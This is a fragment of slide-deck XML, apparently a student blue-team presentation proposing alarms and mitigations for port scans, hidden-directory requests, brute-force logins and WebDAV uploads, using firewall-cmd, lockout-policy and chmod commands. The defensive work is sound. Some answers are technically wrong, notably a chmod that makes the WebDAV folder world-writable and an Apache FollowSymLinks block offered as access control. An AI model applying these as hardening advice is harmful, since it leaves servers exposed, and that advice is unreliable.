            <a:ext cx="5791200" cy="971700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="91425" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>How many requests were made to this directory?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Which files were requested?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1299" name="Google Shape;1299;p86"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3761300" y="835137"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1300" name="Google Shape;1300;p86"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="788938" y="2146350"/>
            <a:ext cx="7566124" cy="26662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pic>
        <p:nvPicPr>
          <p:cNvPr id="1305" name="Google Shape;1305;p87"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274322" y="289900"/>
            <a:ext cx="8595295" cy="4593614"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1306" name="Google Shape;1306;p87"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1631275"/>
            <a:ext cx="8595300" cy="202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a:t>Blue Team</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Proposed Alarms and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3400">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Mitigation Strategies</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1307" name="Google Shape;1307;p87"/>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22</a:t>
            </a:fld>
            <a:endParaRPr sz="6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88"/>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Blocking the Port Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1313" name="Google Shape;1313;p88"/>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14" name="Google Shape;1314;p88"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="4298400" cy="30513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port scans?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="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Set up an alert for tcp scan from a single host within a short period of time.</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What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>15 ports within 5000 milliseconds</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1315" name="Google Shape;1315;p88"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4857750" y="1545525"/>
            <a:ext cx="45738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100"/>
              <a:t>What configurations can be set on the host to mitigate port scans?</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-298450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>Block external networks from accessing intranet ports.</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-298450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>Block unused ports in the firewall.</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-298450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>Setup firewall to detect and block network tcp/udp scans</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-298450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>Update the firewall with the latest packet</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>Describe the solution. If possible, provide required command lines. </a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>---- Intranet access to port 443 </a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>firewall-cmd --permanent --zone=public --add-rich-rule='</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>  rule family="ipv4" source address="192.168.1.0/24"</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>  port protocol="tcp" port="443" accept'</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>---- Block specific port </a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>firewall-cmd --permanent --add-rich-rule='rule family=ipv4 port port="80" protocol="tcp" reject')</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19"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1320" name="Google Shape;1320;p89"/>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Finding the Request for the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1321" name="Google Shape;1321;p89"/>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22" name="Google Shape;1322;p89"/>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unauthorized access?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>A good alarm to set up for detection is a HTTP GET requests</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What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>The threshold to activate this alarm would be x &gt; 150.  This is higher than normal GET requests that we see on a regular basis.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323" name="Google Shape;1323;p89"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4731925"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300"/>
              <a:t>What configuration can be set on the host to block unwanted access?</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>In order to prevent attacks on an Apache server you can go to the httpd.conf file and adjust it.  You may also need to create a .htaccess file which is an HTTP access file.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Describe the solution. If possible, provide required command lines. </a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-311150" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>In the httpd.conf file put in </a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>&lt;Directory /{YOUR DIRECTORY}&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t> Options FollowSymLinks</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t> &lt;/Directory&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr"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27"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1328" name="Google Shape;1328;p90"/>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Preventing Brute Force Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1329" name="Google Shape;1329;p9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457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(1)https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/account-lockout-threshold</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1330" name="Google Shape;1330;p90"/>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An average user will not enter an incorrect password more than a handful of times before contacting support. </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Microsoft account lockout best practice recommends a lockout after 10 incorrect password attempts (1) so an alert could be set at 10.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1331" name="Google Shape;1331;p90"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4719375" y="1535825"/>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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What configuration can be set on the host to block brute force attacks?</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-311150" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>An account lockout solution can prevent a brute force attacker from making repeated attempts to access the server.</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Describe the solution. If possible, provide the required command line(s). </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-311150" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>On our example linux server we could set  $ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>ipa pwpolicy-mod examplegroup --maxfail=10 --lockouttime=600 --failinterval=30</a:t>
            </a:r>
            <a:endParaRPr sz="14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335"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1336" name="Google Shape;1336;p9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Detecting the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1337" name="Google Shape;1337;p91"/>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38" name="Google Shape;1338;p91"/>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We can be alerted when an http-put or http-propfind request is made.</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It would seem that any executed file is a risk so we would set the threshold at zero.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1339" name="Google Shape;1339;p91"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4952150" y="1528175"/>
            <a:ext cx="40503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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What configuration can be set on the host to control access?</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>A better solution would be to make it so that files in the webdav folder are non-executable by default.</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 sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Describe the solution. If possible, provide the required command line(s). </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>$ sudo chmod -R u=rw,go=rw /var/www/webdav/ </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="14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343"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1344" name="Google Shape;1344;p9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Mitigation: Identifying Reverse Shell Uploads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345" name="Google Shape;1345;p92"/>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346" name="Google Shape;1346;p92"/>
          <p:cNvSpPr txBox="1">
